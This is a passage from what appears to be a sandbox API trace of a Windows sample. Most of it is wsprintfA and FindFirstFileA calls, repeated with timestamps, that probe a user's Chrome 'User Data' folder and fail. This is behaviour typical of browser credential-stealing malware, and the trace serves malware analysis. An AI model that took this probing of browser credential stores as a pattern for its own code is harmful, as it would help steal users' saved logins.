0xffffffff [0234.479] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.479] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.479] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.479] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.479] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.479] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.479] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.480] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.480] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.480] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.480] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.480] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.480] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.480] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.480] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.480] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.480] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.481] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.481] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.481] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.481] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.481] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.481] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.481] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.481] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.481] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.481] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.485] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.485] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.485] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.485] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.485] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.486] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.486] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.486] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.486] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.486] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.486] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.486] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.486] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.486] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.486] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.487] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.487] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.487] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.487] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.487] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.487] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.487] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.487] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.488] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.488] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.488] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.488] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.488] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.488] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.488] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.488] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.488] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.488] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.489] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.489] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.489] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.489] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.489] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.489] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.489] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.489] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.489] wsprintfA (in: param_1=0x19844c, 